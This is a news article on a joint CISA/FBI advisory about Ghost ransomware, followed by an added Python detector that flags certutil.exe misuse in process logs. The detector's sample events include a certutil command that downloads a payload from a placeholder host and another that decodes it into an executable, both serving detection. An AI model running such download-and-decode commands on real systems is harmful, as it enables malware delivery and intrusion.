Right after Amigo_A and Swisscom's CSIRT team first spotted Ghost ransomware in early 2021, its operators were dropping custom Mimikatz samples, followed by CobaltStrike beacons, and deploying ransomware payloads using the legitimate Windows CertUtil certificate manager to bypass security software.

Ghost ransomware operators frequently rotate their malware executables, change the file extensions of encrypted files, alter the contents of their ransom notes, and use multiple email addresses for ransom communications, which has often led to fluctuating attribution of the group over time.

"Beginning early 2021, Ghost actors began attacking victims whose internet facing services ran outdated versions of software and firmware," CISA, the FBI, and the Multi-State Information Sharing and Analysis Center (MS-ISAC) said in a joint advisory released on Wednesday.

The joint advisory issued by CISA, the FBI, and MS-ISAC today also includes indicators of compromise (IOCs), tactics, techniques, and procedures (TTPs), and detection methods linked to previous Ghost ransomware activity identified during FBI investigations as recently as January 2025.

Besides being exploited for initial access in Ghost ransomware attacks, the CVE-2018-13379 vulnerability was also targeted by state-backed hacking groups that scanned for vulnerable Fortinet SSL VPN appliances.

CISA and the FBI said attackers deploying Ghost ransomware have breached victims from multiple industry sectors across over 70 countries, including critical infrastructure organizations. Fortinet warned customers to patch their SSL VPN appliances against CVE-2018-13379 multiple times: in August 2019, July 2020, November 2020, and again in April 2021.
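The advisory's note that Ghost operators used the legitimate CertUtil tool to stage payloads is a typical living-off-the-land pattern that defenders can hunt for in process-creation telemetry. The following is an added detection example, not code from the advisory or from BleepingComputer; the article does not quote the actual command lines, so the flagged switches (`-urlcache`, `-decode`, and related file-transform modes) and the Sysmon-style log rows are assumptions and constructed samples.

```python
"""Flag suspicious certutil.exe invocations in process-creation logs.

Added example for this article, not from the joint advisory. The exact
CertUtil usage is not quoted in the article, so the argument patterns below
are assumptions based on CertUtil's documented download/decode switches,
and the log rows are constructed.
"""
import re
import shlex
from typing import Iterable

# Switches that make certutil fetch or transform arbitrary files rather than
# manage certificates. Assumed indicators, not quoted from the advisory.
SUSPICIOUS_SWITCHES = {"-urlcache", "-decode", "-decodehex", "-encode", "-verifyctl"}

# Constructed sample rows in a Sysmon-like "Image|CommandLine|ParentImage" layout.
SAMPLE_EVENTS = [
    r"C:\Windows\System32\certutil.exe|certutil.exe -urlcache -split -f http://203.0.113.10/payload.bin C:\Users\Public\p.bin|C:\Windows\System32\cmd.exe",
    r"C:\Windows\System32\certutil.exe|certutil -decode C:\Users\Public\p.txt C:\Users\Public\p.exe|C:\Windows\System32\cmd.exe",
    r"C:\Windows\System32\certutil.exe|certutil -store my|C:\Windows\explorer.exe",
    r"C:\Windows\System32\notepad.exe|notepad.exe notes.txt|C:\Windows\explorer.exe",
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)


def is_suspicious_certutil(image: str, command_line: str) -> bool:
    """True if the process is certutil invoked with download/decode switches
    or with a URL on its command line. Switches are matched case-insensitively
    with either '-' or '/' prefix, since certutil accepts both."""
    if not image.lower().endswith("\\certutil.exe"):
        return False
    try:
        args = shlex.split(command_line, posix=False)  # keep Windows backslashes intact
    except ValueError:
        args = command_line.split()
    switches = {a.lower().replace("/", "-", 1) for a in args if a[:1] in ("-", "/")}
    return bool(switches & SUSPICIOUS_SWITCHES) or bool(URL_RE.search(command_line))


def scan_events(events: Iterable[str]) -> list[str]:
    """Return the command lines of all rows that match the detection."""
    hits = []
    for row in events:
        image, command_line, _parent = row.split("|", 2)
        if is_suspicious_certutil(image, command_line):
            hits.append(command_line)
    return hits


if __name__ == "__main__":
    for hit in scan_events(SAMPLE_EVENTS):
        print("ALERT certutil LOLBin use:", hit)
```

Ordinary certificate-store operations such as `certutil -store` are left alone, so the rule can be tuned further by whitelisting expected parent processes.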
This Cyber News was published on www.bleepingcomputer.com. Publication date: Wed, 19 Feb 2025 21:00:11 +0000